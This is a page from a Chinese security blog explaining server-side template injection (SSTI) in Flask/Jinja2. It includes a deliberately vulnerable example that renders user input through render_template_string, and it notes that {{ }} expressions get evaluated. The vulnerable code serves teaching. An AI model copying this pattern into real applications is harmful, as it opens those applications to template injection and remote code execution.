<!DOCTYPE html>

<html class="article-header-style-default">
<head>
	
	<title>SSTI原理解析 - wo1fyr的随笔</title>
	<meta charset="utf-8">
	
		<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
	
	<meta name="description" content="SSTI(Server-Side Template Injection)，服务端模板注入。 一、预备知识1.模板引擎模板引擎(特指web端的模板引擎)是为了分离用户界面和业务数据产生的，通过生成特定格式的文档，利用模板引擎生成前端的html代码，只需要获取用户数据放入渲染函数里即可生成模板+用户数据的前端页面呈现给用户浏览器。 2.SSTI现如今的一些框架，像python的flask，php的th">
<meta property="og:type" content="article">
<meta property="og:title" content="SSTI原理解析">
<meta property="og:url" content="http://wo1fyr.github.io/2026/04/23/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/index.html">
<meta property="og:site_name" content="wo1fyr的随笔">
<meta property="og:description" content="SSTI(Server-Side Template Injection)，服务端模板注入。 一、预备知识1.模板引擎模板引擎(特指web端的模板引擎)是为了分离用户界面和业务数据产生的，通过生成特定格式的文档，利用模板引擎生成前端的html代码，只需要获取用户数据放入渲染函数里即可生成模板+用户数据的前端页面呈现给用户浏览器。 2.SSTI现如今的一些框架，像python的flask，php的th">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://wo1fyr.github.io/img/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/2025_11_24_1.png">
<meta property="og:image" content="http://wo1fyr.github.io/img/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/2025_11_24_2.png">
<meta property="og:image" content="http://wo1fyr.github.io/img/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/2025_11_24_3.png">
<meta property="og:image" content="http://wo1fyr.github.io/img/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/2025_11_24_4.png">
<meta property="og:image" content="http://wo1fyr.github.io/img/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/2025_11_24_5.png">
<meta property="article:published_time" content="2026-04-23T03:29:13.968Z">
<meta property="article:modified_time" content="2026-04-23T03:48:39.134Z">
<meta property="article:author" content="wo1fyr">
<meta property="article:tag" content="Python">
<meta property="article:tag" content="SSTI">
<meta property="article:tag" content="模板注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://wo1fyr.github.io/img/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/2025_11_24_1.png">

	<meta name="theme-color" content="#5e72e4">
	<meta name="theme-color-rgb" content="94,114,228">
	<meta name="theme-color-origin" content="#5e72e4">
	<meta name="argon-enable-custom-theme-color" content="true">
	<meta name="theme-card-radius" content="4">
	<meta name="theme-version" content="1.0.2">
	<link rel="icon" href="/assets/img/favicon.ico" type="image/x-icon">
	<link rel="shortcut icon" href="/assets/img/favicon.ico" type="image/x-icon">

	
<link rel="stylesheet" href="/assets/argon_css_merged.css">

	
<link rel="stylesheet" href="/style.css">

	
<link rel="stylesheet" href="//fonts.loli.net/css?family=Open+Sans:300,400,600,700|Noto+Serif+SC:300,600&display=swap.css">

	
<script src="/assets/argon_js_merged.js"></script>

	
<script src="/assets/js/argon.min.js"></script>

	
<script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>


	

	<script>
		var argonConfig = {
			language: "zh_CN",
			
				zoomify: {
					duration: 200,
					easing: "cubic-bezier(0.4,0,0,1)",
					scale: 0.9
				},
			
			pangu: "false",
			
				lazyload: {
					threshold: 800,
					effect: "fadeIn"
				},
			
			disable_pjax: false,
			headroom: false
		}
	</script>
	<script>
		var darkmodeAutoSwitch = "false";
		function setDarkmode(enable){
			if (enable == true){
				$("html").addClass("darkmode");
			}else{
				$("html").removeClass("darkmode");
			}
			$(window).trigger("scroll");
		}
		function toggleDarkmode(){
			if ($("html").hasClass("darkmode")){
				setDarkmode(false);
				sessionStorage.setItem("Argon_Enable_Dark_Mode", "false");
			}else{
				setDarkmode(true);
				sessionStorage.setItem("Argon_Enable_Dark_Mode", "true");
			}
		}
		if (sessionStorage.getItem("Argon_Enable_Dark_Mode") == "true"){
			setDarkmode(true);
		}
		function toggleDarkmodeByPrefersColorScheme(media){
			if (sessionStorage.getItem('Argon_Enable_Dark_Mode') == "false" || sessionStorage.getItem('Argon_Enable_Dark_Mode') == "true"){
				return;
			}
			if (media.matches){
				setDarkmode(true);
			}else{
				setDarkmode(false);
			}
		}
		function toggleDarkmodeByTime(){
			if (sessionStorage.getItem('Argon_Enable_Dark_Mode') == "false" || sessionStorage.getItem('Argon_Enable_Dark_Mode') == "true"){
				return;
			}
			let hour = new Date().getHours();
			if (hour < 7 || hour >= 22){
				setDarkmode(true);
			}else{
				setDarkmode(false);
			}
		}
		if (darkmodeAutoSwitch == 'system'){
			var darkmodeMediaQuery = window.matchMedia("(prefers-color-scheme: dark)");
			darkmodeMediaQuery.addListener(toggleDarkmodeByPrefersColorScheme);
			toggleDarkmodeByPrefersColorScheme(darkmodeMediaQuery);
		}
		if (darkmodeAutoSwitch == 'time'){
			toggleDarkmodeByTime();
		}
		if (darkmodeAutoSwitch == 'alwayson'){
			setDarkmode(true);
		}

		function toggleAmoledDarkMode(){
			$("html").toggleClass("amoled-dark");
			if ($("html").hasClass("amoled-dark")){
				localStorage.setItem("Argon_Enable_Amoled_Dark_Mode", "true");
			}else{
				localStorage.setItem("Argon_Enable_Amoled_Dark_Mode", "false");
			}
		}
		if (localStorage.getItem("Argon_Enable_Amoled_Dark_Mode") == "true"){
			$("html").addClass("amoled-dark");
		}else if (localStorage.getItem("Argon_Enable_Amoled_Dark_Mode") == "false"){
			$("html").removeClass("amoled-dark");
		}
	</script>
	<script>
		if (navigator.userAgent.indexOf("Safari") !== -1 && navigator.userAgent.indexOf("Chrome") === -1){
			$("html").addClass("using-safari");
		}
	</script>

	
		
<script src="/assets/vendor/smoothscroll/smoothscroll1.js"></script>

	
<meta name="generator" content="Hexo 8.1.1"></head>



<style id="themecolor_css">
	
	:root{
		--themecolor: #5e72e4;
		--themecolor-dark0: #5368E2;
		--themecolor-dark: #485FE0;
		--themecolor-dark2: #324CDD;
		--themecolor-dark3: #233DD2;
		--themecolor-light: #8A98EB;
		--themecolor-rgbstr: 94,114,228;
		--themecolor-gradient: linear-gradient(150deg,var(--themecolor-light) 15%, var(--themecolor) 70%, var(--themecolor-dark0) 94%);

	}
</style>
<style id="theme_cardradius_css">
	:root{
		--card-radius: 4px;
	}
</style>

<body>
<div id="toolbar">
	<header class="header-global">
		<nav id="navbar-main" class="navbar navbar-main navbar-expand-lg navbar-transparent navbar-light bg-primary headroom--not-bottom headroom--not-top headroom--pinned">
			<div class="container">
				
				<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbar_global" aria-controls="navbar_global" aria-expanded="false" aria-label="Toggle navigation">
					<span class="navbar-toggler-icon"></span>
				</button>
				<a class="navbar-brand" href="/">wo1fyr的随笔</a>
				<div class="navbar-collapse collapse" id="navbar_global">
					<div class="navbar-collapse-header">
						<div class="row">
							<div class="col-6 collapse-brand"></div>
							<div class="col-6 collapse-close">
								<button type="button" class="navbar-toggler" data-toggle="collapse" data-target="#navbar_global" aria-controls="navbar_global" aria-expanded="false" aria-label="Toggle navigation">
									<span></span>
									<span></span>
								</button>
							</div>
						</div>
					</div>
					<ul id="navbar_search_btn_mobile" class="navbar-nav align-items-lg-center ml-lg-auto">
						<li class="nav-item" data-toggle="modal" data-target="#argon_search_modal" style="padding-left: 5px;">
							<a class="nav-link nav-link-icon">
								<i class="fa fa-search"></i>
								<span class="nav-link-inner--text d-lg-none">搜索</span>
							</a>
						</li>
					</ul>
					
							<ul class='navbar-nav navbar-nav-hover align-items-lg-center'>
								
										<li class='nav-item'>
											<a href='/' class='nav-link' >
												<i class='ni ni-book-bookmark d-lg-none'></i>
												<span class='nav-link-inner--text'>首页</span>
											</a>
											
										</li>
									
										<li class='nav-item'>
											<a href='/archives' class='nav-link' >
												<i class='ni ni-book-bookmark d-lg-none'></i>
												<span class='nav-link-inner--text'>归档</span>
											</a>
											
										</li>
									
										<li class='nav-item'>
											<a href='/talk' class='nav-link' >
												<i class='ni ni-book-bookmark d-lg-none'></i>
												<span class='nav-link-inner--text'>说说</span>
											</a>
											
										</li>
									
										<li class='nav-item'>
											<a href='/categories' class='nav-link' >
												<i class='ni ni-book-bookmark d-lg-none'></i>
												<span class='nav-link-inner--text'>分类</span>
											</a>
											
										</li>
									
							</ul>
						
					<ul class="navbar-nav align-items-lg-center ml-lg-auto">
						<li class="nav-item" data-toggle="modal" data-target="#argon_search_modal" id="navbar_search_btn_pc">
							<a class="nav-link nav-link-icon">
								<i class="fa fa-search"></i>
								<span class="nav-link-inner--text d-lg-none">搜索</span>
							</a>
						</li>
					</ul>
				</div>
				
				<div id="navbar_menu_mask" data-toggle="collapse" data-target="#navbar_global"></div>
			</div>
		</nav>
	</header>
</div>
<div class="modal fade" id="argon_search_modal" tabindex="-1" role="dialog" aria-labelledby="" aria-hidden="true">
	<div class="modal-dialog modal-dialog-centered modal-lg" role="document">
		<div class="modal-content">
			<div class="modal-header">
				<h5 class="modal-title">搜索</h5>
				<button type="button" class="close" data-dismiss="modal" aria-label="Close">
					<span aria-hidden="true">&times;</span>
				</button>
			</div>
			<div class="modal-body">
				<!-- TODO -->
<div class="form-group mb-3">
	<div class="input-group input-group-alternative">
		<div class="input-group-prepend">
			<span class="input-group-text"><i class="fa fa-search"></i></span>
		</div>
		<input id="local-search-input" class="form-control" placeholder="搜索什么..." type="text"  autocomplete="off" data-search.path="search.xml" data-config.root="/">
	</div>
	<div id="local-search-result"></div>
</div>

			</div>
		</div>
	</div>
</div>
<!--Banner-->
<section id="banner" class="banner section section-lg section-shaped">
	<div class="shape shape-style-1 shape-primary">
		<span></span>
		<span></span>
		<span></span>
		<span></span>
		<span></span>
		<span></span>
		<span></span>
		<span></span>
		<span></span>
	</div>

	
	<div id="banner_container" class="banner-container container text-center">
		
			<div class="banner-title text-white"><span class="banner-title-inner">wo1fyr的随笔</span>
		
		</div>
	</div>
	
</section>


	<style>
		#content:before {
			content: '';
			display: block;
			position: fixed;
			left: 0;
			right: 0;
			top: 0;
			bottom: 0;
			z-index: -2;
			background: url(/assets/img/【哲风壁纸】夏日-大海-海滨.png);
			background-position: center;
			background-size: cover;
			background-repeat: no-repeat;
			opacity: 1;
			transition: opacity .5s ease;
		}
		html.darkmode #content:before{
			filter: brightness(0.65);
		}
		
		
			#banner, #banner .shape {
				background: transparent !important;
			}
		
	</style>




<div id="float_action_buttons" class="float-action-buttons fabtns-unloaded">
	<button id="fabtn_toggle_sides" class="btn btn-icon btn-neutral fabtn shadow-sm" type="button" aria-hidden="true" tooltip-move-to-left="移至左侧" tooltip-move-to-right="移至右侧">
		<span class="btn-inner--icon fabtn-show-on-right"><i class="fa fa-caret-left"></i></span>
		<span class="btn-inner--icon fabtn-show-on-left"><i class="fa fa-caret-right"></i></span>
	</button>
	<button id="fabtn_back_to_top" class="btn btn-icon btn-neutral fabtn shadow-sm" type="button" aria-label="Back To Top" tooltip="回到顶部">
		<span class="btn-inner--icon"><i class="fa fa-angle-up"></i></span>
	</button>
	<button id="fabtn_go_to_comment" class="btn btn-icon btn-neutral fabtn shadow-sm d-none" type="button" style='display: none;'  aria-label="Comment" tooltip="评论">
		<span class="btn-inner--icon"><i class="fa fa-comment-o"></i></span>
	</button>
	<button id="fabtn_toggle_darkmode" class="btn btn-icon btn-neutral fabtn shadow-sm" type="button" style='display: none;'  aria-label="Toggle Darkmode" tooltip-darkmode="夜间模式" tooltip-blackmode="暗黑模式" tooltip-lightmode="日间模式">
		<span class="btn-inner--icon"><i class="fa fa-moon-o"></i><i class='fa fa-lightbulb-o'></i></span>
	</button>
	<button id="fabtn_toggle_blog_settings_popup" class="btn btn-icon btn-neutral fabtn shadow-sm" type="button"  aria-label="Open Blog Settings Menu" tooltip="设置">
		<span class="btn-inner--icon"><i class="fa fa-cog"></i></span>
	</button>
	<div id="fabtn_blog_settings_popup" class="card shadow-sm" style="opacity: 0;" aria-hidden="true">
		<div id="close_blog_settings"><i class="fa fa-close"></i></div>
		<div class="blog-setting-item mt-3">
			<div style="transform: translateY(-4px);"><div id="blog_setting_toggle_darkmode_and_amoledarkmode" tooltip-switch-to-darkmode="切换到夜间模式" tooltip-switch-to-blackmode="切换到暗黑模式"><span>夜间模式</span><span>暗黑模式</span></div></div>
			<div style="flex: 1;"></div>
			<label id="blog_setting_darkmode_switch" class="custom-toggle">
				<span class="custom-toggle-slider rounded-circle"></span>
			</label>
		</div>
		<div class="blog-setting-item mt-3">
			<div style="flex: 1;">字体</div>
			<div>
				<button id="blog_setting_font_sans_serif" type="button" class="blog-setting-font btn btn-outline-primary blog-setting-selector-left">Sans Serif</button><button id="blog_setting_font_serif" type="button" class="blog-setting-font btn btn-outline-primary blog-setting-selector-right">Serif</button>
			</div>
		</div>
		<div class="blog-setting-item mt-3">
			<div style="flex: 1;">阴影</div>
			<div>
				<button id="blog_setting_shadow_small" type="button" class="blog-setting-shadow btn btn-outline-primary blog-setting-selector-left">浅阴影</button><button id="blog_setting_shadow_big" type="button" class="blog-setting-shadow btn btn-outline-primary blog-setting-selector-right">深阴影</button>
			</div>
		</div>
		<div class="blog-setting-item mt-3 mb-3">
			<div style="flex: 1;">滤镜</div>
			<div id="blog_setting_filters" class="ml-3">
				<button id="blog_setting_filter_off" type="button" class="blog-setting-filter-btn ml-0" filter-name="off">关闭</button>
				<button id="blog_setting_filter_sunset" type="button" class="blog-setting-filter-btn" filter-name="sunset">日落</button>
				<button id="blog_setting_filter_darkness" type="button" class="blog-setting-filter-btn" filter-name="darkness">暗化</button>
				<button id="blog_setting_filter_grayscale" type="button" class="blog-setting-filter-btn" filter-name="grayscale">灰度</button>
			</div>
		</div>
		<div class="blog-setting-item mb-3">
			<div id="blog_setting_card_radius_to_default" style="cursor: pointer;" tooltip="恢复默认">圆角</div>
			<div style="flex: 1;margin-left: 20px;margin-right: 8px;transform: translateY(2px);">
				<div id="blog_setting_card_radius"></div>
			</div>
		</div>
		
			<div class="blog-setting-item mt-1 mb-3">
				<div style="flex: 1;">主题色</div>
				<div id="theme-color-picker" class="ml-3"></div>
			</div>
		
	</div>
	<button id="fabtn_open_sidebar" class="btn btn-icon btn-neutral fabtn shadow-sm" type="button" aria-label="Open Sidebar Menu" tooltip="菜单">
		<span class="btn-inner--icon"><i class="fa fa-bars"></i></span>
	</button>
	<button id="fabtn_reading_progress" class="btn btn-icon btn-neutral fabtn shadow-sm" type="button" aria-hidden="true" tooltip="阅读进度">
		<div id="fabtn_reading_progress_bar" style="width: 0%;"></div>
		<span id="fabtn_reading_progress_details">0%</span>
	</button>
</div>

<div id="content" class="site-content">









<div class="page-information-card-container">
	
</div>

<div id="sidebar_mask"></div>
<aside id="leftbar" class="leftbar widget-area" role="complementary">
		
		<div id="leftbar_part1" class="widget widget_search card bg-white shadow-sm border-0">
			<div class="leftbar-banner card-body">
				<span class="leftbar-banner-title text-white">wo1fyr的随笔</span>
				
				
			</div>
			
			
				<ul id='leftbar_part1_menu' class='leftbar-menu'>
					<li class='leftbar-menu-item'><a href='/'>首页</a></li><li class='leftbar-menu-item'><a href='/archives'>归档</a></li><li class='leftbar-menu-item'><a href='/talk'>说说</a></li><li class='leftbar-menu-item'><a href='/categories'>分类</a></li>
				</ul>
			
			<div class="card-body text-center leftbar-search-button">
				<button id="leftbar_search" class="btn btn-secondary btn-lg active btn-sm btn-block border-0" role="button" data-toggle="modal" data-target="#argon_search_modal" >
					<i class="menu-item-icon fa fa-search mr-0"></i> 搜索
				</button>
			</div>
		</div>
		<div id="leftbar_part2" class="widget widget_search card bg-white shadow-sm border-0">
			<div id="leftbar_part2_inner" class="card-body">
				
				<div class="nav-wrapper" style="padding-top: 5px;">
	                <ul class="nav nav-pills nav-fill" role="tablist">
						
							<li class="nav-item sidebar-tab-switcher">
								<a class="active show" id="leftbar_tab_catalog_btn" data-toggle="tab" href="#leftbar_tab_catalog" role="tab" aria-controls="leftbar_tab_catalog" no-pjax>文章目录</a>
							</li>
						
						<li class="nav-item sidebar-tab-switcher">
							<a class="" id="leftbar_tab_overview_btn" data-toggle="tab" href="#leftbar_tab_overview" role="tab" aria-controls="leftbar_tab_overview" no-pjax>站点概览</a>
						</li>
	                </ul>
				</div>
				<div>
					<div class="tab-content" style="padding: 10px 10px 0 10px;">
						
							<div class="tab-pane fade active show" id="leftbar_tab_catalog" role="tabpanel" aria-labelledby="leftbar_tab_catalog_btn">
								<div id="leftbar_catalog"></div>
								<script type="text/javascript">
									$(function () {
										$(document).headIndex({
											articleWrapSelector: '#post_content',
											indexBoxSelector: '#leftbar_catalog',
											subItemBoxClass: "index-subItem-box",
											itemClass: "index-item",
											linkClass: "index-link",
											offset: 80,
										});
									})
								</script>
								
							</div>
						
						<div class="tab-pane fade text-center" id="leftbar_tab_overview" role="tabpanel" aria-labelledby="leftbar_tab_overview_btn">
							<img id="leftbar_overview_author_image" src="/assets/img/auther.jpg" class="img-fluid rounded-circle shadow-sm" style="width: 100px;" alt="avatar">
							<h6 id="leftbar_overview_author_name">wo1fyr的随笔</h6>
							<nav class="site-state">
								<div class="site-state-item site-state-posts">
									<a href="/archives">
										<span class="site-state-item-count">14</span>
										<span class="site-state-item-name">文章</span>
									</a>
								</div>
								<div class="site-state-item site-state-categories">
									<a data-toggle="modal" data-target="#blog_categories">
										<span class="site-state-item-count">5</span>
										<span class="site-state-item-name">分类</span>
									</a>
								</div>      
								<div class="site-state-item site-state-tags">
									<a data-toggle="modal" data-target="#blog_tags">
										<span class="site-state-item-count">20</span>
										<span class="site-state-item-name">标签</span>
									</a>
								</div>
							</nav>
							
									<div class="site-author-links">
										
									</div>
								
							
									<div class='site-friend-links'>
										<div class='site-friend-links-title'><i class='fa fa-fw fa-link'></i> Links</div>
										<ul class='site-friend-links-ul'>
											
												<li class='site-friend-links-item'>
													<a href='/link' rel='noopener' target='_blank'>友情链接</a>
												</li>
											
												<li class='site-friend-links-item'>
													<a href='https://github.com/wo1fyr' rel='noopener' target='_blank'>Github</a>
												</li>
											
										</ul>
									</div>
								
						</div>
					</div>
				</div>
			</div>
		</div>
</aside>
<div class="modal fade" id="blog_categories" tabindex="-1" role="dialog" aria-labelledby="" aria-hidden="true">
	<div class="modal-dialog modal-dialog-centered">
		<div class="modal-content">
			<div class="modal-header">
				<h5 class="modal-title">分类</h5>
				<button type="button" class="close" data-dismiss="modal" aria-label="Close">
					<span aria-hidden="true">&times;</span>
				</button>
			</div>
			<div class="modal-body">
				<a class="badge badge-secondary tag" href="/categories/CTF/" rel="tag">CTF <span class="tag-num">2</span></a><a class="badge badge-secondary tag" href="/categories/CVE/" rel="tag">CVE <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/categories/Web%E5%AE%89%E5%85%A8/" rel="tag">Web安全 <span class="tag-num">8</span></a><a class="badge badge-secondary tag" href="/categories/tools/" rel="tag">tools <span class="tag-num">2</span></a><a class="badge badge-secondary tag" href="/categories/%E6%9D%82%E9%A1%B9/" rel="tag">杂项 <span class="tag-num">1</span></a>
			</div>
		</div>
	</div>
</div>
<div class="modal fade" id="blog_tags" tabindex="-1" role="dialog" aria-labelledby="" aria-hidden="true">
	<div class="modal-dialog modal-dialog-centered">
		<div class="modal-content">
			<div class="modal-header">
				<h5 class="modal-title">标签</h5>
				<button type="button" class="close" data-dismiss="modal" aria-label="Close">
					<span aria-hidden="true">&times;</span>
				</button>
			</div>
			<div class="modal-body">
				<a class="badge badge-secondary tag" href="/tags/CTF/" rel="tag">CTF <span class="tag-num">2</span></a><a class="badge badge-secondary tag" href="/tags/CTF%E5%88%B7%E9%A2%98/" rel="tag">CTF刷题 <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/CTF%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/" rel="tag">CTF工具使用 <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/CVE%E5%AD%A6%E4%B9%A0/" rel="tag">CVE学习 <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/JavaScript/" rel="tag">JavaScript <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/MD5%E7%A2%B0%E6%92%9E/" rel="tag">MD5碰撞 <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/PHP/" rel="tag">PHP <span class="tag-num">5</span></a><a class="badge badge-secondary tag" href="/tags/Python/" rel="tag">Python <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/SSTI/" rel="tag">SSTI <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/XSS/" rel="tag">XSS <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">代码审计 <span class="tag-num">3</span></a><a class="badge badge-secondary tag" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透 <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" rel="tag">原型链污染 <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/" rel="tag">模板注入 <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透 <span class="tag-num">2</span></a><a class="badge badge-secondary tag" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试 <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现 <span class="tag-num">2</span></a><a class="badge badge-secondary tag" href="/tags/%E8%84%9A%E6%9C%AC%E6%94%B6%E9%9B%86/" rel="tag">脚本收集 <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/%E8%87%AA%E5%A2%9E%E5%8E%9F%E7%90%86/" rel="tag">自增原理 <span class="tag-num">1</span></a><a class="badge badge-secondary tag" href="/tags/%E9%9A%A7%E9%81%93%E6%90%AD%E5%BB%BA/" rel="tag">隧道搭建 <span class="tag-num">2</span></a>
			</div>
		</div>
	</div>
</div>


<div id="primary" class="content-area">
	<main id="main" class="site-main" role="main">
		
		
			
	<article class="post post-full card bg-white shadow-sm border-0 ">
	<header class="post-header text-center">
		
		<a class="post-title" href="/2026/04/23/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/">SSTI原理解析</a>
		<div class="post-meta">
			
						
						<div class="post-meta-detail post-meta-detail-time">
							<i class="fa fa-clock-o" aria-hidden="true"></i>
							<time title="发布于 2026-4-23 11:29:13 | 编辑于 2026-4-23 11:48:39">2026-4-23 11:29
							</time>
						</div>
					
						
							<div class="post-meta-devide">|</div>
						
						<div class="post-meta-detail post-meta-detail-categories">
							<i class="fa fa-bookmark-o" aria-hidden="true"></i>
							<a class="post-meta-detail-catagory-link" href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a>
						</div>
					
						
							<div class="post-meta-devide">|</div>
						
						<div class="post-meta-detail post-meta-detail-words">
							<i class="fa fa fa-book" aria-hidden="true"></i>
							<span id="busuanzi_container_page_pv">
								阅读<span id="busuanzi_value_page_pv"></span>次
							</span>
						</div>
					
						
							<div class="post-meta-devide">|</div>
						
						<div class="post-meta-detail post-meta-detail-words">
							<i class="fa fa-file-word-o" aria-hidden="true"></i>
							2k 字
						</div>
					
						
							<div class="post-meta-devide">|</div>
						
						<div class="post-meta-detail post-meta-detail-readingtime">
							<i class="fa fa-hourglass-end" aria-hidden="true"></i>
							8 分钟
						</div>
					
		</div>
		
	</header>

	<div class="post-content" id="post_content">
		<p>SSTI(Server-Side Template Injection)，服务端模板注入。</p>
<h2 id="一、预备知识"><a href="#一、预备知识" class="headerlink" title="一、预备知识"></a>一、预备知识</h2><h3 id="1-模板引擎"><a href="#1-模板引擎" class="headerlink" title="1.模板引擎"></a>1.模板引擎</h3><p>模板引擎(特指web端的模板引擎)是为了分离用户界面和业务数据产生的，通过生成特定格式的文档，利用模板引擎生成前端的html代码，只需要获取用户数据放入渲染函数里即可生成模板+用户数据的前端页面呈现给用户浏览器。</p>
<h2 id="2-SSTI"><a href="#2-SSTI" class="headerlink" title="2.SSTI"></a>2.SSTI</h2><p>现如今的一些框架，像<code>python的flask</code>，<code>php的thinkphp</code>，<code>java的spring</code>等一般都是使用成熟MVC模式：</p>
<ol>
<li>用户的输入先进入Controller控制器</li>
<li>根据请求类型和请求指令发送到对应Model业务模型进行业务逻辑判断和数据库存取</li>
<li>将结果返回到View视图层，经过模板渲染后展现给用户</li>
</ol>
<p>而SSTI漏洞成因就是因为服务端接收用户输入后，未做任何处理就将其作为Web应用模板内容的一部分，模板引擎进行目标编译渲染时，执行了用户输入的恶意语句，从而导致敏感信息泄露、RCE、getshell等问题。</p>
<h2 id="二、常见SSTI问题"><a href="#二、常见SSTI问题" class="headerlink" title="二、常见SSTI问题"></a>二、常见SSTI问题</h2><h3 id="1-python中的ssti-jinja2"><a href="#1-python中的ssti-jinja2" class="headerlink" title="1.python中的ssti-jinja2"></a>1.python中的ssti-jinja2</h3><h4 id="示例代码"><a href="#示例代码" class="headerlink" title="示例代码"></a>示例代码</h4><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, request, render_template_string

app = Flask(__name__)
<span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/ssti&#x27;</span></span>)</span>
<span class="hljs-keyword">def</span> <span class="hljs-title function_">ssti_view</span>():
    user_input = request.args.get(<span class="hljs-string">&#x27;input&#x27;</span>, <span class="hljs-string">&#x27;guest&#x27;</span>)
    template_code = <span class="hljs-string">f&#x27;&#x27;&#x27;</span>
<span class="hljs-string">        &lt;div style=&quot;text-align: center; margin-top: 50px; font-family: sans-serif;&quot;&gt;</span>
<span class="hljs-string">            &lt;h3&gt;Hello, <span class="hljs-subst">&#123;user_input&#125;</span>&lt;/h3&gt;</span>
<span class="hljs-string">        &lt;/div&gt;</span>
<span class="hljs-string">    &#x27;&#x27;&#x27;</span>
    <span class="hljs-keyword">return</span> render_template_string(template_code)
<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:
    app.run(debug=<span class="hljs-literal">True</span>, host=<span class="hljs-string">&#x27;127.0.0.1&#x27;</span>, port=<span class="hljs-number">5000</span>)</code></pre>

<p><img class="lazyload lazyload-style-1" src="data:image/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+"  data-original="/img/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/2025_11_24_1.png" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC"></p>

<p><img class="lazyload lazyload-style-1" src="data:image/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+"  data-original="/img/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/2025_11_24_2.png" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC"></p>

<p>此时默认的模板解释参数为guest，分析代码可知此时服务端的运行逻辑是接收前端输入的input参数，将其返回到后端拼接后返回前端进行展示</p>
<p>两种主要的模板渲染函数：</p>
<p><code>render_template()</code>: 用于渲染一个指定的模板文件；</p>
<p><code>render_template_string()</code>: 用于渲染一个作为输入的字符串</p>
<p>Jinja2模板引擎使用双大括号<code>&#123;&#123; &#125;&#125;</code>作为变量包裹标识符，当模板函数（尤其是在使用字符串作为模板的场景）进行渲染时，它会把<code>&#123;&#123; &#125;&#125;</code>包裹起来的内容当作变量或表达式进行解析替换。</p>
<p>模板注入漏洞的成因就是渲染函数在渲染时，往往<strong>不会对用户输入的变量做渲染</strong>，而是直接替换。然而，如果用户输入的数据包含了 Jinja2 的变量包裹标识符<code>&#123;&#123;&#125;&#125;</code>，那么用户输入的内容就会被解析执行。(像 <code> 2*2</code> 被解析成 <code>4</code> )</p>
